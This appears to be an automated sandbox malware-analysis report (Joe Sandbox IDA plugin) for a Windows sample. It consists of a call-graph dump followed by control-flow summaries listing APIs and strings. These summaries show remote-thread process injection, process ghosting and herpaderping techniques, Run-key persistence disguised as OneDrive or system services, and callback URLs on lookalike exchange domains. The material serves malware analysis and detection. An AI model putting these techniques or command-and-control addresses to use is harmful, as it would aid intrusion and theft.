16172->16175 16176 7ff68a18a599 16172->16176 16174 7ff68a19ae30 _RunAllParam 70 API calls 16173->16174 16174->16175 16177 7ff68a19ae30 _RunAllParam 70 API calls 16175->16177 16178 7ff68a181b50 _RunAllParam 70 API calls 16176->16178 16180 7ff68a18a5a8 _cftof2_l 16176->16180 16179 7ff68a18a63a 16177->16179 16178->16180 16180->16167 16182 7ff68a18ed4e 16181->16182 16193 7ff68a18ed6f 16181->16193 16183 7ff68a18ed5f 16182->16183 16184 7ff68a18ed71 16182->16184 16182->16193 16185 7ff68a190908 _errno 68 API calls 16183->16185 16186 7ff68a18d650 ungetwc 69 API calls 16184->16186 16187 7ff68a18ed64 16185->16187 16188 7ff68a18ed79 16186->16188 16189 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 16187->16189 16204 7ff68a18eb94 16188->16204 16189->16193 16192 7ff68a18d6ec ungetwc LeaveCriticalSection 16192->16193 16193->16167 16195 7ff68a182639 16194->16195 16196 7ff68a1826e4 16194->16196 16198 7ff68a1826f0 16195->16198 16199 7ff68a182650 16195->16199 16203 7ff68a18265e _cftof2_l 16195->16203 16197 7ff68a19ae30 _RunAllParam 70 API calls 16196->16197 16197->16198 16200 7ff68a19ae30 _RunAllParam 70 API calls 16198->16200 16202 7ff68a181b50 _RunAllParam 70 API calls 16199->16202 16199->16203 16201 7ff68a1826fd 16200->16201 16202->16203 16203->16167 16207 7ff68a18ebc2 16204->16207 16210 7ff68a18ebdc 16204->16210 16205 7ff68a18ebcc 16206 7ff68a190908 _errno 68 API calls 16205->16206 16208 7ff68a18ebd1 16206->16208 16207->16205 16207->16210 16214 7ff68a18ec0e _expandlocale 16207->16214 16209 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 16208->16209 16209->16210 16210->16192 16212 7ff68a18dd00 _flush 89 API calls 16212->16214 16213 7ff68a193554 _fileno 68 API calls 16213->16214 16214->16210 16214->16212 16214->16213 16215 7ff68a19452c _write 89 API calls 16214->16215 16216 7ff68a1933bc 16214->16216 16215->16214 16239 7ff68a1938bc InitOnceExecuteOnce 16216->16239 16218 7ff68a1933db 16219 7ff68a193554 _fileno 68 API calls 16218->16219 16234 7ff68a1933e1 16218->16234 16220 7ff68a1933f1 16219->16220 16221 7ff68a1933fc 16220->16221 16222 7ff68a19340d 16220->16222 16223 7ff68a190908 _errno 68 API calls 16221->16223 16224 7ff68a193412 16222->16224 16232 7ff68a19341f wprintf 16222->16232 16223->16234 16225 7ff68a190908 _errno 68 API calls 16224->16225 16225->16234 16226 7ff68a193482 16227 7ff68a19348f 16226->16227 16228 7ff68a19351a 16226->16228 16230 7ff68a1934ab 16227->16230 16235 7ff68a1934c4 16227->16235 16229 7ff68a19452c _write 89 API calls 16228->16229 16229->16234 16231 7ff68a19452c _write 89 API calls 16230->16231 16231->16234 16232->16226 16233 7ff68a196a54 _isatty 69 API calls 16232->16233 16232->16234 16236 7ff68a193476 16232->16236 16233->16236 16234->16214 16235->16234 16243 7ff68a1942bc 16235->16243 16236->16226 16240 7ff68a193f0c 16236->16240 16239->16218 16241 7ff68a18f740 _malloc_crt 68 API calls 16240->16241 16242 7ff68a193f25 16241->16242 16242->16226 16244 7ff68a1942df 16243->16244 16245 7ff68a1942f7 16243->16245 16247 7ff68a190898 __doserrno 68 API calls 16244->16247 16246 7ff68a1938bc _ioinit InitOnceExecuteOnce 16245->16246 16253 7ff68a1942fc 16246->16253 16248 7ff68a1942e4 16247->16248 16249 7ff68a190908 _errno 68 API calls 16248->16249 16250 7ff68a1942ec 16249->16250 16250->16234 16251 7ff68a19437e 16252 7ff68a190898 __doserrno 68 API calls 16251->16252 16254 7ff68a194383 16252->16254 16253->16250 16253->16251 16255 7ff68a194336 16253->16255 16256 7ff68a190908 _errno 68 API calls 16254->16256 16257 7ff68a199fe4 __lock_fhandle 70 API calls 16255->16257 16258 7ff68a19438b 16256->16258 16259 7ff68a19433d 16257->16259 16260 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 16258->16260 16261 7ff68a194349 16259->16261 16262 7ff68a19435b 16259->16262 16260->16250 16263 7ff68a1943ac _lseeki64_nolock 71 API calls 16261->16263 16264 7ff68a190908 _errno 68 API calls 16262->16264 16266 7ff68a194356 16263->16266 16265 7ff68a194360 16264->16265 16267 7ff68a190898 __doserrno 68 API calls 16265->16267 16268 7ff68a19a45c _unlock_fhandle LeaveCriticalSection 16266->16268 16267->16266 16268->16250 16270 7ff68a188fd1 16269->16270 16271 7ff68a189010 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 16270->16271 16272 7ff68a18a31c _RunAllParam 96 API calls 16270->16272 16271->15725 16272->16271 16274 7ff68a185217 16273->16274 16275 7ff68a184fd5 16273->16275 16276 7ff68a183c1c 70 API calls 16274->16276 16278 7ff68a183c1c 70 API calls 16275->16278 16292 7ff68a1851b1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 16276->16292 16277 7ff68a18bb20 _expandlocale 9 API calls 16279 7ff68a185247 16277->16279 16280 7ff68a18501d 16278->16280 16279->15391 16281 7ff68a18a920 70 API calls 16280->16281 16282 7ff68a185034 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 16281->16282 16283 7ff68a18a920 70 API calls 16282->16283 16284 7ff68a185098 FindFirstFileW 16283->16284 16286 7ff68a1850ba std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 16284->16286 16287 7ff68a183c1c 70 API calls 16286->16287 16293 7ff68a1850f4 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 16287->16293 16288 7ff68a18518a FindNextFileW 16289 7ff68a18519f 16288->16289 16288->16293 16302 7ff68a18a9f0 16289->16302 16291 7ff68a183c1c 70 API calls 16291->16293 16292->16277 16293->16288 16293->16291 16297 7ff68a18b665 16294->16297 16295 7ff68a185cbf 16295->15402 16296 7ff68a18a6f8 70 API calls 16296->16297 16297->16295 16297->16296 16299 7ff68a183a82 16298->16299 16299->16299 16300 7ff68a183c1c 70 API calls 16299->16300 16301 7ff68a183a98 16300->16301 16301->15518 16303 7ff68a18aa47 16302->16303 16308 7ff68a18aa55 16302->16308 16306 7ff68a183fb0 70 API calls 16303->16306 16303->16308 16304 7ff68a183d3c 70 API calls 16305 7ff68a18aa86 16304->16305 16307 7ff68a183d3c 70 API calls 16305->16307 16306->16308 16309 7ff68a18aa97 16307->16309 16308->16304 16309->16292 16311 7ff68a18756b 16310->16311 16312 7ff68a18756f Process32FirstW 16310->16312 16316 7ff68a18bb20 _expandlocale 9 API calls 16311->16316 16313 7ff68a18758b 16312->16313 16314 7ff68a1875b4 CloseHandle 16312->16314 16315 7ff68a18759e Process32NextW 16313->16315 16319 7ff68a1875b0 16313->16319 16356 7ff68a18d0f0 16313->16356 16314->16311 16315->16313 16315->16319 16317 7ff68a1875cf 16316->16317 16317->15591 16319->16314 16373 7ff68a18ee98 GetSystemTimeAsFileTime 16320->16373 16325 7ff68a1876a8 16326 7ff68a182610 _RunAllParam 70 API calls 16325->16326 16327 7ff68a1876f0 16325->16327 16378 7ff68a18e690 16325->16378 16326->16325 16328 7ff68a18bb20 _expandlocale 9 API calls 16327->16328 16329 7ff68a1876ff 16328->16329 16329->15596 16331 7ff68a187865 _cftof2_l 16330->16331 16332 7ff68a187718 12 API calls 16331->16332 16333 7ff68a18786f 7 API calls 16332->16333 16334 7ff68a18bb20 _expandlocale 9 API calls 16333->16334 16335 7ff68a1878ea RegOpenKeyExA 16334->16335 16335->15597 16335->15607 16381 7ff68a181fd0 CreateToolhelp32Snapshot 16336->16381 16339 7ff68a181990 70 API calls 16340 7ff68a182143 16339->16340 16389 7ff68a181eb8 16340->16389 16342 7ff68a182346 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 16343 7ff68a18bb20 _expandlocale 9 API calls 16342->16343 16345 7ff68a182388 16343->16345 16344 7ff68a181808 70 API calls 16354 7ff68a182150 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t _wsetlocale_set_cat 16344->16354 16345->15603 16346 7ff68a181eb8 70 API calls 16346->16354 16347 7ff68a18225d GetCurrentProcess OpenProcessToken 16348 7ff68a1822d9 OpenProcess 16347->16348 16349 7ff68a18228e LookupPrivilegeValueA 16347->16349 16348->16354 16350 7ff68a1822b0 AdjustTokenPrivileges 16349->16350 16351 7ff68a1822cf CloseHandle 16349->16351 16350->16351 16351->16348 16353 7ff68a18230a WaitForSingleObject 16355 7ff68a182316 CloseHandle 16353->16355 16354->16342 16354->16344 16354->16346 16354->16347 16354->16353 16354->16355 16396 7ff68a183084 16354->16396 16355->16354 16357 7ff68a18d106 16356->16357 16358 7ff68a18d16b 16356->16358 16360 7ff68a190908 _errno 68 API calls 16357->16360 16367 7ff68a18d12a 16357->16367 16359 7ff68a18cc04 _LocaleUpdate::_LocaleUpdate 68 API calls 16358->16359 16361 7ff68a18d19a 16359->16361 16362 7ff68a18d110 16360->16362 16363 7ff68a18d1a6 16361->16363 16370 7ff68a18d1bd 16361->16370 16364 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 16362->16364 16365 7ff68a190908 _errno 68 API calls 16363->16365 16366 7ff68a18d11b 16364->16366 16368 7ff68a18d1ab 16365->16368 16366->16313 16367->16313 16369 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 16368->16369 16372 7ff68a18d1b6 16369->16372 16371 7ff68a1921f4 69 API calls _towlower_l 16370->16371 16370->16372 16371->16370 16372->16313 16374 7ff68a1876a0 16373->16374 16375 7ff68a18e6bc 16374->16375 16376 7ff68a191f68 _getptd 68 API calls 16375->16376 16377 7ff68a18e6c9 16376->16377 16377->16325 16379 7ff68a191f68 _getptd 68 API calls 16378->16379 16380 7ff68a18e699 16379->16380 16380->16325 16382 7ff68a182042 Process32First 16381->16382 16388 7ff68a182032 16381->16388 16383 7ff68a18205c 16382->16383 16382->16388 16405 7ff68a18248c 16383->16405 16385 7ff68a18bb20 _expandlocale 9 API calls 16387 7ff68a1820a9 16385->16387 16386 7ff68a18206b Process32Next 16386->16383 16386->16388 16387->16339 16388->16385 16390 7ff68a181808 70 API calls 16389->16390 16394 7ff68a181f11 16390->16394 16391 7ff68a181f8d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 16392 7ff68a18bb20 _expandlocale 9 API calls 16391->16392 16393 7ff68a181fbc 16392->16393 16393->16354 16394->16391 16395 7ff68a182610 _RunAllParam 70 API calls 16394->16395 16395->16394 16397 7ff68a183178 16396->16397 16400 7ff68a1830bf 16396->16400 16398 7ff68a18bb20 _expandlocale 9 API calls 16397->16398 16399 7ff68a183191 16398->16399 16399->16354 16400->16397 16401 7ff68a1830e4 VirtualAllocEx 16400->16401 16401->16397 16402 7ff68a183108 WriteProcessMemory 16401->16402 16402->16397 16403 7ff68a183127 VirtualProtectEx 16402->16403 16403->16397 16404 7ff68a183148 CreateRemoteThread 16403->16404 16404->16397 16406 7ff68a182562 16405->16406 16407 7ff68a1824ae 16405->16407 16409 7ff68a182768 70 API calls 16406->16409 16411 7ff68a1824e6 _expandlocale 16406->16411 16407->16406 16408 7ff68a1824b7 16407->16408 16408->16411 16412 7ff68a182768 16408->16412 16409->16411 16411->16386 16413 7ff68a182807 16412->16413 16414 7ff68a18279e 16412->16414 16413->16411 16415 7ff68a18280c 16414->16415 16416 7ff68a1827cb 16414->16416 16417 7ff68a19ae30 _RunAllParam 70 API calls 16415->16417 16420 7ff68a18281c 16416->16420 16418 7ff68a182818 16417->16418 16421 7ff68a182868 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 16420->16421 16422 7ff68a18283e 16420->16422 16421->16413 16423 7ff68a182860 16422->16423 16425 7ff68a18c51c std::_Facet_Register 70 API calls 16422->16425 16423->16421 16424 7ff68a19adec std::_Xbad_alloc 2 API calls 16423->16424 16426 7ff68a1828e3 16424->16426 16425->16423 16428 7ff68a1962c4 16427->16428 16429 7ff68a190986 16428->16429 16430 7ff68a190908 _errno 68 API calls 16428->16430 16429->14191 16429->14192 16431 7ff68a1962e9 16430->16431 16432 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 16431->16432 16432->16429 16458 7ff68a195978 16433->16458 16436 7ff68a196b11 LoadLibraryExW 16438 7ff68a196b2e GetLastError 16436->16438 16439 7ff68a196b56 GetProcAddress 16436->16439 16437 7ff68a196c04 IsDebuggerPresent 16440 7ff68a196c0e 16437->16440 16441 7ff68a196c2b 16437->16441 16445 7ff68a196c21 16438->16445 16446 7ff68a196b3d LoadLibraryW 16438->16446 16439->16445 16447 7ff68a196b6f 7 API calls 16439->16447 16442 7ff68a196c13 OutputDebugStringW 16440->16442 16443 7ff68a196c1c 16440->16443 16441->16443 16444 7ff68a196c30 DecodePointer 16441->16444 16442->16443 16443->16445 16452 7ff68a196c5c DecodePointer DecodePointer 16443->16452 16455 7ff68a196c7a 16443->16455 16444->16445 16449 7ff68a18bb20 _expandlocale 9 API calls 16445->16449 16446->16439 16446->16445 16447->16437 16448 7ff68a196be4 GetProcAddress EncodePointer 16447->16448 16448->16437 16453 7ff68a196d27 16449->16453 16450 7ff68a196cc2 DecodePointer 16451 7ff68a196cf6 DecodePointer 16450->16451 16454 7ff68a196ccd 16450->16454 16451->16445 16452->16455 16453->14236 16454->16451 16456 7ff68a196ce3 DecodePointer 16454->16456 16455->16450 16455->16451 16457 7ff68a196cb0 16455->16457 16456->16451 16456->16457 16457->16451 16459 7ff68a19598a GetModuleHandleW GetProcAddress 16458->16459 16460 7ff68a1959b0 16458->16460 16459->16460 16460->16436 16460->16437 16462 7ff68a18f2d0 GetProcAddress 16461->16462 16463 7ff68a18f2e7 ExitProcess 16461->16463 16462->16463 16465 7ff68a193d0c _lock 60 API calls 16464->16465 16466 7ff68a18f50e 16465->16466 16467 7ff68a18f535 DecodePointer 16466->16467 16474 7ff68a18f5fc doexit 16466->16474 16468 7ff68a18f553 DecodePointer 16467->16468 16467->16474 16471 7ff68a18f578 16468->16471 16471->16474 16475 7ff68a18f586 EncodePointer 16471->16475 16479 7ff68a18f59a DecodePointer EncodePointer 16471->16479 16472 7ff68a18f632 16476 7ff68a18f331 16472->16476 16482 7ff68a193ef4 LeaveCriticalSection 16472->16482 16474->16472 16481 7ff68a193ef4 LeaveCriticalSection 16474->16481 16475->16471 16480 7ff68a18f5b3 DecodePointer DecodePointer 16479->16480 16480->16471

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$File$CloseCreateEnvironmentExpandFreeHandleLibraryLoadModuleNameStringsVirtual
                                                                                                                                                                                                                                  • String ID: %SystemRoot%\system32\relog.exe$NtCreateProcessEx$NtCreateThreadEx$NtQueryInformationFile$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$RtlCreateProcessParametersEx$ntdll.dll
                                                                                                                                                                                                                                  • API String ID: 2492227563-894273064
                                                                                                                                                                                                                                  • Opcode ID: 05723221f10f05c9ceba05eb359f8972ba9721e587aa526d6aa84a9de4d9c412
                                                                                                                                                                                                                                  • Instruction ID: 7da8b0877a216bffa6d8dc241a36f73f3239a102c3cb45b101464b88a36a948b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05723221f10f05c9ceba05eb359f8972ba9721e587aa526d6aa84a9de4d9c412
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38511B60B0BB82E1EE109B11E8542696BA5BF89B80F8841BDDDDD97795EF7CE409C700

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Temp$ErrorInformationInitLastNameOpenPathStringUnicodeWrite
                                                                                                                                                                                                                                  • String ID: $0$@$\??\$ghosting$herpaderping$lockering
                                                                                                                                                                                                                                  • API String ID: 2041432290-2373984688
                                                                                                                                                                                                                                  • Opcode ID: 64822b8613db8bc1c2a2e951a3a571df23e4e807d8a1f1aa68da66fb63762df5
                                                                                                                                                                                                                                  • Instruction ID: e6cecb5f7335d42fc58387536666ec0157e3c802c43c1b7805aa00b07d81f052
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64822b8613db8bc1c2a2e951a3a571df23e4e807d8a1f1aa68da66fb63762df5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99816032B19A81E9E710CF64E8842ED3BB5FF44758F440179DE9DA6AA8DF38E549C700

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$File$Directory$AttributesCopyCreateErrorFolderInformationLastModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                                                  • API String ID: 3525706726-4119554291
                                                                                                                                                                                                                                  • Opcode ID: 22d15947ae3bae42f231afd136f066c34fb2ee88ca39dd14ed79a9b50fbaaefc
                                                                                                                                                                                                                                  • Instruction ID: e7e4368f9036ac681343881c1a62c1d338425734816017f395c536f6d0eaaf22
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22d15947ae3bae42f231afd136f066c34fb2ee88ca39dd14ed79a9b50fbaaefc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B41A732619B46E1EB108F25E4403AEBB66FF94784F845179DA9E839A8DF3CE14DC700

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$File$Open$CreateReadWrite
                                                                                                                                                                                                                                  • String ID: https://auth.xn--conbase-sfb.xyz/event.php$https://exchanger.ink/event.php
                                                                                                                                                                                                                                  • API String ID: 769820311-1523628693
                                                                                                                                                                                                                                  • Opcode ID: bcf234d6e8469795b09c9773892b9828d64290e906b07b609975a1d29e9d043d
                                                                                                                                                                                                                                  • Instruction ID: 23a6bc9445dbca7f33c49f2ae299eec7fc5464612ca2c640833ae9fc1608e939
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcf234d6e8469795b09c9773892b9828d64290e906b07b609975a1d29e9d043d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45417321A1A646D2FB608B21A51577A7B62FF48BD8F000179DEDD46F95EF7CE409CB00

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 162 7ff68a187f1c-7ff68a187f7c 163 7ff68a187f83 162->163 164 7ff68a187f7e-7ff68a187f81 162->164 166 7ff68a187f86-7ff68a187f8e 163->166 165 7ff68a187f90-7ff68a187fb5 call 7ff68a183c1c call 7ff68a18afb8 164->165 171 7ff68a187fba-7ff68a187fd2 FindFirstFileW 165->171 172 7ff68a187fb7 165->172 166->165 166->166 173 7ff68a187fdd-7ff68a187ff0 171->173 174 7ff68a187fd4-7ff68a187fd8 call 7ff68a18c484 171->174 172->171 176 7ff68a187ffc-7ff68a18800f 173->176 177 7ff68a187ff2-7ff68a187ff7 call 7ff68a18c484 173->177 174->173 179 7ff68a1882ef-7ff68a188319 call 7ff68a18bb20 176->179 180 7ff68a188015-7ff68a18801c 176->180 177->176 181 7ff68a1882ce-7ff68a1882e0 FindNextFileW 180->181 182 7ff68a188022-7ff68a188037 180->182 181->180 187 7ff68a1882e6-7ff68a1882e9 FindClose 181->187 184 7ff68a188039-7ff68a188040 182->184 185 7ff68a188046-7ff68a18804d 182->185 184->181 184->185 188 7ff68a18806c-7ff68a188080 185->188 189 7ff68a18804f-7ff68a188056 185->189 187->179 191 7ff68a188087 188->191 192 7ff68a188082-7ff68a188085 188->192 189->188 190 7ff68a188058-7ff68a188066 189->190 190->181 190->188 194 7ff68a18808a-7ff68a188092 191->194 193 7ff68a188094-7ff68a18810d call 7ff68a183c1c call 7ff68a18afb8 * 5 192->193 207 7ff68a188118-7ff68a18812a 193->207 208 7ff68a18810f-7ff68a188113 call 7ff68a18c484 193->208 194->193 194->194 210 7ff68a18812c-7ff68a188130 call 7ff68a18c484 207->210 211 7ff68a188135-7ff68a188147 207->211 208->207 210->211 213 7ff68a188152-7ff68a188164 211->213 214 7ff68a188149-7ff68a18814d call 7ff68a18c484 211->214 216 7ff68a18816f-7ff68a188182 213->216 217 7ff68a188166-7ff68a18816a call 7ff68a18c484 213->217 214->213 219 7ff68a18818e-7ff68a1881ba CopyFileW 216->219 220 7ff68a188184-7ff68a188189 call 7ff68a18c484 216->220 217->216 222 7ff68a1882be-7ff68a1882c3 219->222 223 7ff68a1881c0-7ff68a1881d6 219->223 220->219 222->181 226 7ff68a1882c5-7ff68a1882c9 call 7ff68a18c484 222->226 224 7ff68a1881d8-7ff68a1881db 223->224 225 7ff68a1881dd-7ff68a1881e4 223->225 227 7ff68a1881f1-7ff68a188219 call 7ff68a183c1c call 7ff68a18b004 224->227 228 7ff68a1881e7-7ff68a1881ef 225->228 226->181 234 7ff68a18821e-7ff68a188254 RegOpenKeyExW 227->234 235 7ff68a18821b 227->235 228->227 228->228 236 7ff68a188265-7ff68a18826a 234->236 237 7ff68a188256-7ff68a188260 call 7ff68a182ad0 234->237 235->234 239 7ff68a188275-7ff68a18828c 236->239 240 7ff68a18826c-7ff68a188270 call 7ff68a18c484 236->240 237->236 242 7ff68a18828e-7ff68a188293 call 7ff68a18c484 239->242 243 7ff68a188298-7ff68a1882ba call 7ff68a187c00 SetFileAttributesW 239->243 240->239 242->243 243->222
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Find$AttributesCloseCopyFirstNextOpen
                                                                                                                                                                                                                                  • String ID: .exe$Software\Microsoft\Windows\CurrentVersion\Run$\Service_
                                                                                                                                                                                                                                  • API String ID: 1925689219-4233635908
                                                                                                                                                                                                                                  • Opcode ID: 3b435baa05f6d8803ba0415212f736da15b78584862174ec23049d42598ee05d
                                                                                                                                                                                                                                  • Instruction ID: 6857cf92d9ae4f9c78b8629086ce399a8bb8025f95ead5779406c29c249cc18d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b435baa05f6d8803ba0415212f736da15b78584862174ec23049d42598ee05d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7B1C022A5AB92E5EB20DF60D8401EC3B75FF40798F404179EE9D97AA9DF38E494C340

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763390450.00007FF68A1A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763405502.00007FF68A1B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763421276.00007FF68A1BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff68a180000_xj40xovMsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileModuleName$FolderOpenPath$CloseValue
                                                                                                                                                                                                                                  • String ID: OneDrive$Software\Microsoft\Windows\CurrentVersion\Run$WpnUserService
                                                                                                                                                                                                                                  • API String ID: 2892408737-3975739113
                                                                                                                                                                                                                                  • Opcode ID: e45bb9ae70fb6b9d345573ff3fa9ad46ef1455935eccfa489949dc55301faabc
                                                                                                                                                                                                                                  • Instruction ID: b0eb04463cdfadf146c09bfec35879bb3007b2329f913df69deb420411e5be02
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e45bb9ae70fb6b9d345573ff3fa9ad46ef1455935eccfa489949dc55301faabc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B841D932719A87E1EB60DF20E8417EA2764FF45349F801079DA9D97598EF3DE209C700

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1763371099.00007FF68A181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68A180000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1763352987.00007FF68A180000.00000002.00000001.01000000.00000003.sdmpDownload File
